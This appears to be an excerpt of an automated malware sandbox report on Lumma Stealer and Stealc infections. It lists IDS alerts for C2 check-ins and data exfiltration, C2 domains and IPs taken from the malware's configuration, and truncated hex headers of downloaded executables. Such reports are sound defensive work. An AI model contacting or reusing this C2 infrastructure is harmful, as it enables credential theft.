Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50179 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50197 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50198 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:50194 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49910 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49910 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49920 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49920 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49932 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49978 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49978 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49989 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49989 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50073 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50122 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50126 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50072 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50131 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50158 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50127 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50127 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50125 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50056 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50186 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50186 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50058 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50115 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50115 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50129 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50129 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50198 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50197 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50197 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50187 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50187 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50113 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50113 -> 188.114.97.3:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:56:09 GMTContent-Type: application/octet-streamContent-Length: 2712064Last-Modified: Fri, 01 Nov 2024 09:00:50 GMTConnection: keep-aliveETag: "672498c2-296200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 29 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2a 00 00 04 00 00 c2 10 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 76 74 6e 77 6f 78 70 00 20 29 00 00 a0 00 00 00 02 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6f 64 7a 6c 6a 74 6b 00 20 00 00 00 c0 29 00 00 04 00 00 00 3c 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 29 00 00 22 00 00 00 40 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:56:12 GMTContent-Type: application/octet-streamContent-Length: 1852416Last-Modified: Fri, 01 Nov 2024 09:52:29 GMTConnection: keep-aliveETag: "6724a4dd-1c4400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 a0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 49 00 00 04 00 00 34 20 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 85 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 84 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 69 62 68 73 6d 63 6f 00 30 19 00 00 60 30 00 00 26 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 72 63 68 68 7a 70 79 00 10 00 00 00 90 49 00 00 06 00 00 00 1c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 49 00 00 22 00 00 00 22 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:57:09 GMTContent-Type: application/octet-streamContent-Length: 6172760Last-Modified: Thu, 31 Oct 2024 16:49:02 GMTConnection: keep-aliveETag: "6723b4fe-5e3058"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0b 00 bd da 90 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 19 00 74 0a 00 00 70 02 00 00 00 00 00 bc 83 0a 00 00 10 00 00 00 90 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 c0 0d 00 00 04 00 00 e5 e9 5e 00 02 00 40 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 70 0b 00 71 00 00 00 00 50 0b 00 ec 0f 00 00 00 b0 0c 00 00 10 01 00 00 00 00 00 00 00 00 00 00 08 5e 00 58 28 00 00 00 a0 0b 00 a8 0f 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 00 00 c2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 71 00 00 00 00 70 0b 00 00 02 00 00 00 c4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 18 00 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 5d 00 00 00 00 90 0b 00 00 02 00 00 00 c6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 0f 01 00 00 a0 0b 00 00 10 01 00 00 c8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:57:18 GMTContent-Type: application/octet-streamContent-Length: 2900480Last-Modified: Fri, 01 Nov 2024 09:52:08 GMTConnection: keep-aliveETag: "6724a4c8-2c4200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 50 2f 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2f 00 00 04 00 00 3f 9e 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 7e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 74 65 66 70 63 75 7a 00 90 29 00 00 b0 05 00 00 88 29 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 71 77 65 75 72 72 6f 00 10 00 00 00 40 2f 00 00 04 00 00 00 1c 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 2f 00 00 22 00 00 00 20 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:57:24 GMTContent-Type: application/octet-streamContent-Length: 2134016Last-Modified: Fri, 01 Nov 2024 09:52:22 GMTConnection: keep-aliveETag: "6724a4d6-209000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 b0 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 72 00 00 04 00 00 fd 90 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 66 62 6d 75 62 78 79 00 e0 19 00 00 c0 58 00 00 e0 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 70 79 79 64 61 65 75 00 10 00 00 00 a0 72 00 00 04 00 00 00 6a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 72 00 00 22 00 00 00 6e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:57:30 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Fri, 01 Nov 2024 09:00:24 GMTConnection: keep-aliveETag: "672498a8-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 